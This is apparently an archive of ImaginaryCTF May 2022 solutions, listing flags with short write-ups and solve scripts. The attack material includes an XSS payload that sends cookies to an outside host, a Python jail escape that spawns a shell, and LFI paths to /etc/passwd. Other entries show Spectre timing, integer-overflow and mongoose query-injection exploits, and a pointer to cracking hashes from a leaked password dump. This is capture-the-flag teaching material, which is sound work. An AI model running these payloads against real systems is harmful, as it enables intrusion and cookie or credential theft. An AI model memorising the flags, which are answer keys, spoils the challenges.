Archived Challenges - May 2022

Solve

ictf{w3lcome_to_round_22!}

Morse Code

ictf{MR_SAMUEL_MORSE}

from pwn import *
import time

LOCAL = 0
last_time = time.time()

def get_new_process():
    if LOCAL:
        return process(['python3', './spectre.py'])
    else:
        return remote('puzzler7.imaginaryctf.org', 1014)

def time_diff():
    global last_time
    ret = time.time() - last_time
    last_time = time.time()
    return ret

def read(addr):
    p.sendline(f'READ {addr}')
    print(p.recvuntil('>>> '))

def write(addr, char):
    p.sendline(f'WRITE {addr} {char}')
    print(p.recvuntil('>>> '))

def flush():
    p.sendline('FLUSH')
    print(p.recvuntil('>>>'))

p = get_new_process()
print(p.recvuntil('>>> '))
for i in range(32, 127):
    write(i, i)

flag = 'ictf{'
idx = 1048+5
while '}' not in flag:
    flush()
    read(f'0[1000[{idx}]]')
    for i in range(32, 127):
        time_diff()
        read(f'0[{i}]')
        if time_diff() < 0.25:
            flag += chr(i)
            print(flag, idx)
            idx += 1
            break

print(flag)```

This challenge implements the Spectre side-channel attack. By requesting an address like `0[1000[1048]]`, the memory caches the value at 0+the value at 2048. Then, by iterating over the addresses near zero, the one that was cached will be fast to load, telling us the value of memory at address 2048.

Check out this video for a better explanation: https://www.youtube.com/watch?v=mgAN4w7LH2o

ictf{sp000kygh0s+}

Take the integral of c**nx, and then take the derivative. Add the correct C value, and then multiply by 111. Divide by 37, then divide by 3. Finally, XOR with 0x0000000000000000 and long_to_bytes. ROT26 to get the flag.

ictf{rs4_1s_34sy_r1ght_y3y}

(a^{d) ^ (a}c) ^ (a^{b) ^ (a}b^cflag) will approximate the flag because d is small.

ictf{x0r_is_commut4tiv3_4nd_4ssoci4tiv3}

Solve script: https://imaginaryctf.org/f/jK0bf#x.py

The vulnerability is in the signing - the verifier only checks the first bytes of the message, up to the original size of the message when signing. However, you can append data to a valid message, which allows you to have (mostly) arbitrary data with a valid signature. With this, you can tell Alice that g**b is just 1, which will make the AES key the md5 hash of 1, and the flag can then be recovered.

ictf{be_careful_what_you_sign_eve_is_watching_us}

https://imaginaryctf.org/f/9rL53#x.py

As before, you can append arbitrary data to a signed message. Here's A~Z's excellent explanation of the crypto bits:

That is, you can verify a number of the form g^b * 10^k + c where c and k are controlled constants. With a large enough k, you can set c = - g^b * 10^k mod p + x: alice will parse a number that is congruent to x mod p, for an arbitrary x. Set x = 0, you are done.```

ictf{eve_do_you_know_any_good_signing_libraries}

https://gchq.github.io/CyberChef/#recipe=From_Hex('%5C%5Cx')ADD(%7B'option':'Hex','string':'0a'%7D)XOR(%7B'option':'Hex','string':'96'%7D,'Standard',false)SUB(%7B'option':'Hex','string':'0a'%7D)&input=XHhkYlx4ZjFceGRlXHhkY1x4MDlceGVmXHg5ZVx4ZTFceDBiXHhmNVx4ZTBceGVmXHgwY1x4ZjVceGEzXHhlMVx4ZjVceGExXHhmM1x4ZTFceDBiXHgwNw

ictf{e4sy_rev_1s_3asy}

from sympy import factorint
from Crypto.Util.number import long_to_bytes

ungodel =  '_S0+*()1'

def ungodelify(g):
    f = factorint(g)
    ret = ''
    for p in f:
        ret += ungodel[f[p]]
    return ret

def unstrify(s):
    for i in range(5, 0, -1):
        s = s.replace('S'*i+'0', str(i))
    return eval(s)


if __name__ == '__main__':
    enc = int(open('output.txt').read())
    print(long_to_bytes(unstrify(ungodelify(enc))))```

https://en.wikipedia.org/wiki/G%C3%B6del_numbering
https://xkcd.com/2610/

Factor the encoded flag to turn it into a string, and then parse the string. S is the successor function, so `S0` is 1, `SS0` is 2, and so on. This could probably be parsed in a better way, but eval handles it quite nicely.

ictf{everything_is_d@t@}

from pwn import *

p = remote("puzzler7.imaginaryctf.org", 1015)

for i in range(233):
    print(i)
    p.sendline('1')
    p.recvuntil('>>> ')
    p.sendline('4294')

p.recvuntil('>>> ')
p.sendline('4')
p.interactive()```

The binary double checks to make sure that the multiplication of the quantity times the price doesn't overflow. However, there's an integer overflow vulnerability in `check_balance`. The total_cost passed in is an unsigned int, but the function casts it to a signed int. This means that doing a multiplication that won't overflow an unsigned int, but will overflow a signed int will appear as purchasing a large number of apples for negative money. The largest number you can do this with is 4294 apples in a single purchase, and doing this 233 times gives you enough apples to get the flag.

ictf{integer_overflow_strikes_again!!}

No spoilers!

ictf{n0r_4nd_nand_wh4ts_the_d1ff3erence?}

When given an array for a non array field mongoose implicitly changes the query to $in https://mongoosejs.com/docs/tutorials/query_casting.html#implicit-in

Make a request to /api/definition with body {"word":["flag", "anything"]}

ictf{m0ng00s3_1mpl1c17_1n_p41n}

from requests import get
from time import sleep

flag = 'ictf{'

letters = 'abcdefghijklmnopqrstuvwxyz_}'

url = 'http://137.184.207.224:1003/search?key='

num_reqs = 0

while '}' not in flag:
    for c in letters:
        r = get(url+flag+c)
        num_reqs += 1
        if 'results: 1' in r.text:
            flag += c
            break
    print(flag)

print(f"Total Requests: {num_reqs}")```

https://xkcd.com/936/

Simple blind searching - although you can't see the flag itself, you can see if the searched string is in the flag, and thus you can brute force the flag one character at a time.

ictf{correcthorsebatterystaplenohackpls}

http://puzzler7.imaginaryctf.org:1005/file/....%2f%2fetc/passwd

There is a LFI vulnerability, but the escaping of the ../ isn't recursive, so putting one inside another (like ....//) leads to it staying in the filename.

ictf{recursive_regex_saves_lives}

http://puzzler7.imaginaryctf.org:1007/curl?url=f[h-i]le:///app/flag.txt

Use globbing to bypass the blacklist of accessing the file.

ictf{globs_and_globs_of_flags}

http://puzzler7.imaginaryctf.org:1011/render?html=%3Cscript%3E%0D%0A++++var+xmlHttp+%3D+new+XMLHttpRequest%28%29%3B%0D%0A++++xmlHttp.open%28+%22GET%22%2C+%22https%3A%2F%2Fpuzzler.free.beeceptor.com%2F%22%2Bdocument.cookie%2C+false+%29%3B%0D%0A++++xmlHttp.send%28+null+%29%3B%0D%0A%3C%2Fscript%3E

Very simple XSS, just makes a request to beeceptor with the cookie

ictf{expect_more_xss_in_the_future!_271ef0d2}

import numpy as np
from scipy.io import wavfile
from scipy.fft import fft

def decode_tone(data):
    msg_bits = []

    idx = 0
    while True:
        if 512*(idx+1) > len(data):
            break
        frame = data[512*idx:512*(idx+1)][:,0]
        tone_power = abs(fft(frame))[255]
        if tone_power > 1e9:
            msg_bits.append('1')
        else:
            msg_bits.append('0')
        idx += 1
    
    msg_bits = ''.join(msg_bits)
    ret = []
    while len(msg_bits) > 0:
        num = msg_bits[:8]
        msg_bits = msg_bits[8:]
        while len(num) < 8:
            num += '0'
        ret.append(int(num, 2))

    return bytes(ret)

fs, orig = wavfile.read("tone.wav")
print(decode_tone(orig))```

Take the Discrete Fourier Transform of every 512 data points, which tells you how strong the individual frequencies are at that point. Then, if the frequency of 21963 Hz is strong enough, those data points encode a 1, otherwise a 0. This can be combined into the flag

ictf{you_can't_hear_it_but_it's_still_there}

Use Wireshark to filter by ftp-data and extract the proj-test file to run it.

ictf{M@k3_$ur3_T0_u$3_t1s_f0r_ftp}

from pwn import *
from time import sleep

LOCAL = 0

def get_new_process():
    if LOCAL:
        return process(["python3", "jail.py"])
    else:
        return remote("137.184.207.224", 1002)

exploit = "__import__('os').system('sh')"

p = get_new_process()
for i in range(len(set(exploit))):
    p.sendline('')
    p.sendline(exploit)
sleep(.5)
p.recv()
p.sendline("cat flag.txt")
p.interactive()```

The validate function has a list as a default argument, which means that every time the function is called with the default argument, it refers to the same list. Thus, repeatedly attempting to use the same escape command without providing any characters to use will repeatedly add characters to the default argument, until the exploit is possible to run.

ictf{it's_very_hard_to_keep_a_snake_in_prison}

https://xkcd.com/1354/

ictf{my_H3@rt_1s_Ble3d1ng}

ret2dlresolve

ictf{aaaaaaaaaaaaaaaaaaaaaaaaaaaaa}

ret2libc or just copy paste the script from yesterday, it should still work

ictf{the_puts_m4de_all_the_difference_9be1d9f3}

%1n works, the main goal of this chall was to get you to not use pwntools fmtstr_payload

ictf{imagine_filtering_19b22d99}

There's several solutions, but the easiest is the circuit a a a with no initial True or False inputs. This creates a loop where the wire a is initially None, then True, then False, then True, and so on. Many circuits that loop back in on themselves will solve this, though.

ictf{sponsored_by_nor_VPN}

# defining T/F/N rails
# None nor False == True
none false true
#
# some clocks
false clock3 output
false output clock1
false clock1 clock2
clock1 clock2 clock3

# true inputs

# false inputs
false```

NORing together two signals one timestep apart yields the desired pattern.

ictf{nors_arent_the_most_efficient_but_thats_neither_here_nor_there}

Zooming in on the second picture shows a poster for Arduino for Total Newbies, taught by Mitch Altman. Searching this will pull up his flickr, and you can scroll through his albums for 2018 to find the conference, which is meeting at St. John's University this year.

ictf{stjohnsuniversity}

Searching for gamigo password dump (or doing a pastebin search on e.g. https://pastebin.ga/) will pull up the paste of the database leak like this (https://pastebin.com/ELuvHeZf). The hash can then be cracked, either manually or a website like CrackStation.

Unfortunately for the bonus flag, this is only a few of the emails in the database dump - can you find the rest?

ictf{yxcvb}

No spoilers

ictf{534485ec7e3a4291bab353bc35661a7e}